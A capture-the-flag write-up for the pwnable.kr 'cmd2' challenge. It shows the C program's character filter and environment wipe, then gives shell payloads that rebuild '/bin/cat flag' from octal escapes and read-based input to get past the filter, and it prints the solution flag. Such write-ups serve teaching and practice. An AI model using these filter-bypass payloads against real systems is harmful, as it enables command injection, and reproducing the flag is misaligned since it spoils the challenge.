Pwnable.kr - cmd2

Challenge description:

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want!

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "=")!=0;
	r += strstr(cmd, "PATH")!=0;
	r += strstr(cmd, "export")!=0;
	r += strstr(cmd, "/")!=0;
	r += strstr(cmd, "`")!=0;
	r += strstr(cmd, "flag")!=0;
	return r;
}

extern char** environ;
void delete_env(){
	char** p;
	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
	delete_env();
	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
	printf("before:   %s\n", argv[1]);
	if(filter(argv[1])) return 0;
	printf("%s\n", argv[1]);
	system( argv[1] );
	return 0;
}

This challenge has more restrictions, the biggest one is filtering forward slash /, this will prevent us from executing any binary the usual way like this /bin/binary.

The only solution that worked with me is passing the octal value of / (57) to printf with format string %b.

Solution:

cmd2@pwnable:~$ ./cmd2 '$(printf "%bbin%bcat %s%s" "\57" "\57" "fl" "ag")'

cmd2@pwnable:~$ ./cmd2 '$(read x; echo $x)'	# not my solution but it's very cool
/bin/cat flag

Flag: FuN_w1th_5h3ll_v4riabl3s_haha